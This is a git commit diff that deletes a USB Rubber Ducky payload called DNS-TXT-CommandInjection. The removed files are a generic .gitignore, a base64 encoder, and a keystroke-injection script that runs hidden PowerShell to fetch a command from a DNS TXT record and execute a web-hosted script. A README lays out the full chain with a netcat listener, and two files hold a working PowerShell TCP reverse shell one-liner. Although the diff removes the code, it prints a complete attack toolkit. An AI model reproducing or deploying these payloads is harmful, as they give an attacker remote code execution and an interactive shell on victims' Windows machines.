Delete payloads/library/execution/DNS-TXT-CommandInjection directory

Deleting the files requested in the pull request review.
pull/468/head
Nate 2024-08-04 14:29:33 -05:00 committed by GitHub
parent 1fd0843049
commit c8e0ac280b
GPG Key ID: B5690EEEBB952194
6 changed files with 0 additions and 275 deletions


@ -1,175 +0,0 @@
# VSCode
.vscode/*
!.vscode/settings.json
!.vscode/tasks.json
!.vscode/launch.json
!.vscode/extensions.json
*.code-workspace
# Local History for <a href="https://www.jcchouinard.com/python-with-vscode/">Visual Studio Code</a>
.history/
# Common credential files
**/credentials.json
**/client_secrets.json
**/client_secret.json
*creds*
*.dat
*password*
*.httr-oauth*
# Private Node Modules
node_modules/
creds.js
# Private Files
*.json
*.csv
*.csv.gz
*.tsv
*.tsv.gz
*.xlsx
# Mac/OSX
.DS_Store
# Byte-compiled / optimized / DLL files
__pycache__/
*.py[cod]
*$py.class
# C extensions
*.so
# Distribution / packaging
.Python
build/
develop-eggs/
dist/
downloads/
eggs/
.eggs/
lib/
lib64/
parts/
sdist/
var/
wheels/
share/python-wheels/
*.egg-info/
.installed.cfg
*.egg
MANIFEST
# PyInstaller
# Usually these files are written by a <a href="https://www.jcchouinard.com/learn-python/">python</a> script from a template
# before PyInstaller builds the exe, so as to inject date/other infos into it.
*.manifest
*.spec
# Installer logs
pip-log.txt
pip-delete-this-directory.txt
# Unit test / coverage reports
htmlcov/
.tox/
.nox/
.coverage
.coverage.*
.cache
nosetests.xml
coverage.xml
*.cover
*.py,cover
.hypothesis/
.pytest_cache/
cover/
# Translations
*.mo
*.pot
# Django stuff:
*.log
local_settings.py
db.sqlite3
db.sqlite3-journal
# Flask stuff:
instance/
.webassets-cache
# Scrapy stuff:
.scrapy
# Sphinx documentation
docs/_build/
# PyBuilder
.pybuilder/
target/
# <a href="https://www.jcchouinard.com/how-to-use-jupyter-notebook/">Jupyter Notebook</a>
.ipynb_checkpoints
# IPython
profile_default/
ipython_config.py
# pyenv
# For a library or package, you might want to ignore these files since the code is
# intended to run in multiple environments; otherwise, check them in:
# .python-version
# pipenv
# According to pypa/pipenv#598, it is recommended to include Pipfile.lock in <a href="https://www.jcchouinard.com/version-control/">version control.</a>
# However, in case of collaboration, if having platform-specific dependencies or dependencies
# having no cross-platform support, pipenv may install dependencies that don't work, or not
# install all needed dependencies.
#Pipfile.lock
# PEP 582; used by e.g. github.com/David-OConnor/pyflow
__pypackages__/
# Celery stuff
celerybeat-schedule
celerybeat.pid
# SageMath parsed files
*.sage.py
# Environments
.env
.venv
env/
venv/
ENV/
env.bak/
venv.bak/
# <a href="https://www.jcchouinard.com/python-with-spyder-ide/">Spyder</a> project settings
.spyderproject
.spyproject
# Rope project settings
.ropeproject
# mkdocs documentation
/site
# mypy
.mypy_cache/
.dmypy.json
dmypy.json
# Pyre type checker
.pyre/
# pytype static type analyzer
.pytype/
# Cython debug symbols
cython_debug/


@ -1,3 +0,0 @@
$text = Read-Host -prompt "What would you like to encode"
$base64Text = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($text))
echo $base64Text


@ -1,38 +0,0 @@
REM Title: DNS-TXT-CommandInjection
REM Author: Nate
REM Description: A usb rubber ducky payload that leverages DNS TXT records to perform command injection.
REM Windows Powershell is the CLI used by the payload. Replace the DNS TXT record for your domain with
REM the base64 encoded payload you have. See README.md for more details on converting your payload to base64
REM and an example of creating your DNS TXT record in AWS Route53 service.
REM Target: Windows 10, 11
REM Props: Hak5, Darren Kitchen, Korben
REM Version: 1.0
REM Category: Execution
REM CONFIGURATION
REM REQUIRED A domain with the ability to manipulate the DNS TXT records.
REM REQUIRED Web Server hosting the payload. In this example, python3 http.server was used to host a
REM reverseshell.
REM REQUIRED A listener for incoming connections like netcat.
REM REQUIRED - Provide URL used for Example
DEFINE #MY_TARGET_URL example.com
REM Example: powershell /w 1 $a=(resolve-dnsname MY_TARGET_URL TXT).strings;powershell -e $a
REM Example of Decoded payload: "irm http://MY_TARGET_URL/T1.txt | iex"
REM NOTES: No base64 can be used as an alternative by replacing "$a=",";powershell -e $a" with just "|iex"
REM for the STRING payload below. Examples of the decoded command and encoded command are shown below to put
REM into DNS TXT record.
REM Decoded: "irm http://MY_TARGET_URL/T1.txt | iex"
REM Encoded: "aQByAG0AIABoAHQAdABwADoALwAvAGUAeABhAG0AcABsAGUALgBjAG8AbQAvAFQAMQAuAHQAeAB0ACAAfAAgAGkAZQB4AA=="
REM ShoutOut: powershell reverse shell one-liner by Nikhil SamratAshok Mittal @samratashok. See link below.
REM https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3
REM The link below has the Powershell script to convert your payloads to Base64.
REM https://github.com/nathansb2022/usbrubberducky-payloads/blob/master/payloads/library/execution/DNS-TXT-CommandInjection/ConvertBase64.ps1
DELAY 1000
GUI r
DELAY 1000
STRING powershell /w 1 $a=(resolve-dnsname MY_TARGET_URL TXT).strings;powershell -e $a
DELAY 500
ENTER


@ -1,49 +0,0 @@
# DNS-TXT-CommandInjection
Ducky Script uses Resolve-DnsName to perform a DNS name query resolution for a domain hosting a malicious TXT record.
## Description
A usb rubber ducky payload that leverages DNS TXT records to perform command injection. Windows Powershell is the CLI used by the payload. Replace the DNS TXT record for your domain with the base64 encoded payload you have. See link below for an example of creating your DNS TXT record in AWS Route53 service.
## Requirements
A domain with the ability to manipulate the DNS TXT records.
Web Server hosting the payload. In this example, python3 http.server was used to host a reverseshell.
A listener for incoming connections like netcat.
Provide URL used for Example
DEFINE #MY_TARGET_URL example.com
## Notes
No base64 can be used as an option by replacing "$a=",";powershell -e $a" with just "|iex" for the STRING payload below. Examples of the decoded command and encoded command are shown below to put into DNS TXT record.
Decoded: "irm http://MY_TARGET_URL/T1.txt | iex"
Encoded: "aQByAG0AIABoAHQAdABwADoALwAvAGUAeABhAG0AcABsAGUALgBjAG8AbQAvAFQAMQAuAHQAeAB0ACAAfAAgAGkAZQB4AA=="
powershellReverseShellOne-liner.ps1 is identical to T1.txt. (file name shortened due to character limitations)
## Windows Commands (used in payload)
### Execute DNS TXT Payload
```Powershell
powershell /w 1 $a=(resolve-dnsname MY_TARGET_URL TXT).strings;powershell -e $a
```
### Execute web hosted Powershell Reverseshell
```Powershell
irm http://MY_TARGET_URL/T1.txt | iex
```
### [Powershell Reverseshell One-liner](https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3)
```Powershell
.\powershellReverseShellOne-liner.ps1
```
### Convert payload to base64
```Powershell
.\convertBase64.ps1
```
### Alternative to executing Powershell Script
```Powershell
gc -raw .\convertBase64.ps1 | iex
```
## Linux Commands
```bash
nc -lvnp 1337
```
### Links
[Powershell Reverseshell One-liner](https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3)
[Convert to base64](https://github.com/nathansb2022/usbrubberducky-payloads/blob/master/payloads/library/execution/DNS-TXT-CommandInjection/ConvertBase64.ps1)
[Create TXT record in AWS Route53](https://www.entrust.com/knowledgebase/ssl/how-to-create-a-txt-record-on-amazon-aws-route-53-for-entrust-email-validation-method)


@ -1,5 +0,0 @@
# Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html
# CONFIGURATION
# REQUIRED - Provide IP and Port used for Example
# DEFINE #MY_TARGET_IP and Port after TCPClient(
$client = New-Object System.Net.Sockets.TCPClient('1.2.3.4',1337);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()


@ -1,5 +0,0 @@
# Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html
# CONFIGURATION
# REQUIRED - Provide IP and Port used for Example
# DEFINE #MY_TARGET_IP and Port after TCPClient(
$client = New-Object System.Net.Sockets.TCPClient('1.2.3.4',1337);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()